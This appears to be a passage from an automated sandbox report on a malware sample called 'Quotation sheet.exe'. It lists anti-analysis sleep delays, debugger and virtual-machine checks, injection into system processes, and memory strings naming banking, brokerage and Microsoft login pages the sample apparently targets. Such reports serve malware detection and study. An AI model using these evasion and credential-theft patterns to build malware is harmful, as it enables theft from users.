                      Source: C:\Users\user\Desktop\Quotation sheet.exe TID: 992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6088Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 3224Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 3224Thread sleep time: -84000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe TID: 5700Thread sleep time: -40000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe TID: 5700Thread sleep time: -34500s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7C920 FindFirstFileW,FindNextFileW,FindClose,9_2_02D7C920
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 72Z53078.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 72Z53078.9.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: 72Z53078.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 72Z53078.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: Quotation sheet.exe, 00000000.00000002.2336603379.0000000001522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 72Z53078.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: 72Z53078.9.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000318C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 72Z53078.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: 72Z53078.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: 72Z53078.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: Quotation sheet.exeBinary or memory string: sqemu
                      Source: 72Z53078.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972653059.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                      Source: 72Z53078.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 72Z53078.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 72Z53078.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 72Z53078.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: 72Z53078.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 72Z53078.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: 72Z53078.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: 72Z53078.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: firefox.exe, 0000000D.00000002.2759893628.00000234CC90C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417983 LdrLoadDll,7_2_00417983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6500 mov eax, dword ptr fs:[00000030h]7_2_053C6500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338550 mov eax, dword ptr fs:[00000030h]7_2_05338550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338550 mov eax, dword ptr fs:[00000030h]7_2_05338550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053545B1 mov eax, dword ptr fs:[00000030h]7_2_053545B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053545B1 mov eax, dword ptr fs:[00000030h]7_2_053545B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E59C mov eax, dword ptr fs:[00000030h]7_2_0536E59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332582 mov eax, dword ptr fs:[00000030h]7_2_05332582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332582 mov ecx, dword ptr fs:[00000030h]7_2_05332582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05364588 mov eax, dword ptr fs:[00000030h]7_2_05364588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053325E0 mov eax, dword ptr fs:[00000030h]7_2_053325E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C5ED mov eax, dword ptr fs:[00000030h]7_2_0536C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C5ED mov eax, dword ptr fs:[00000030h]7_2_0536C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053365D0 mov eax, dword ptr fs:[00000030h]7_2_053365D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A5D0 mov eax, dword ptr fs:[00000030h]7_2_0536A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A5D0 mov eax, dword ptr fs:[00000030h]7_2_0536A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E5CF mov eax, dword ptr fs:[00000030h]7_2_0536E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E5CF mov eax, dword ptr fs:[00000030h]7_2_0536E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A430 mov eax, dword ptr fs:[00000030h]7_2_0536A430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C427 mov eax, dword ptr fs:[00000030h]7_2_0532C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BC460 mov ecx, dword ptr fs:[00000030h]7_2_053BC460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA456 mov eax, dword ptr fs:[00000030h]7_2_053EA456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532645D mov eax, dword ptr fs:[00000030h]7_2_0532645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535245A mov eax, dword ptr fs:[00000030h]7_2_0535245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053644B0 mov ecx, dword ptr fs:[00000030h]7_2_053644B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BA4B0 mov eax, dword ptr fs:[00000030h]7_2_053BA4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053364AB mov eax, dword ptr fs:[00000030h]7_2_053364AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA49A mov eax, dword ptr fs:[00000030h]7_2_053EA49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053304E5 mov ecx, dword ptr fs:[00000030h]7_2_053304E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov eax, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov ecx, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov eax, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AC730 mov eax, dword ptr fs:[00000030h]7_2_053AC730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C720 mov eax, dword ptr fs:[00000030h]7_2_0536C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C720 mov eax, dword ptr fs:[00000030h]7_2_0536C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330710 mov eax, dword ptr fs:[00000030h]7_2_05330710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05360710 mov eax, dword ptr fs:[00000030h]7_2_05360710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C700 mov eax, dword ptr fs:[00000030h]7_2_0536C700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338770 mov eax, dword ptr fs:[00000030h]7_2_05338770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330750 mov eax, dword ptr fs:[00000030h]7_2_05330750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BE75D mov eax, dword ptr fs:[00000030h]7_2_053BE75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372750 mov eax, dword ptr fs:[00000030h]7_2_05372750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372750 mov eax, dword ptr fs:[00000030h]7_2_05372750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4755 mov eax, dword ptr fs:[00000030h]7_2_053B4755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov esi, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov eax, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov eax, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053307AF mov eax, dword ptr fs:[00000030h]7_2_053307AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E47A0 mov eax, dword ptr fs:[00000030h]7_2_053E47A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D678E mov eax, dword ptr fs:[00000030h]7_2_053D678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053347FB mov eax, dword ptr fs:[00000030h]7_2_053347FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053347FB mov eax, dword ptr fs:[00000030h]7_2_053347FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BE7E1 mov eax, dword ptr fs:[00000030h]7_2_053BE7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533C7C0 mov eax, dword ptr fs:[00000030h]7_2_0533C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B07C3 mov eax, dword ptr fs:[00000030h]7_2_053B07C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E627 mov eax, dword ptr fs:[00000030h]7_2_0534E627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05366620 mov eax, dword ptr fs:[00000030h]7_2_05366620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368620 mov eax, dword ptr fs:[00000030h]7_2_05368620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533262C mov eax, dword ptr fs:[00000030h]7_2_0533262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372619 mov eax, dword ptr fs:[00000030h]7_2_05372619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE609 mov eax, dword ptr fs:[00000030h]7_2_053AE609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362674 mov eax, dword ptr fs:[00000030h]7_2_05362674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F866E mov eax, dword ptr fs:[00000030h]7_2_053F866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F866E mov eax, dword ptr fs:[00000030h]7_2_053F866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A660 mov eax, dword ptr fs:[00000030h]7_2_0536A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A660 mov eax, dword ptr fs:[00000030h]7_2_0536A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534C640 mov eax, dword ptr fs:[00000030h]7_2_0534C640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053666B0 mov eax, dword ptr fs:[00000030h]7_2_053666B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C6A6 mov eax, dword ptr fs:[00000030h]7_2_0536C6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334690 mov eax, dword ptr fs:[00000030h]7_2_05334690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334690 mov eax, dword ptr fs:[00000030h]7_2_05334690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B06F1 mov eax, dword ptr fs:[00000030h]7_2_053B06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B06F1 mov eax, dword ptr fs:[00000030h]7_2_053B06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0536A6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A6C7 mov eax, dword ptr fs:[00000030h]7_2_0536A6C7
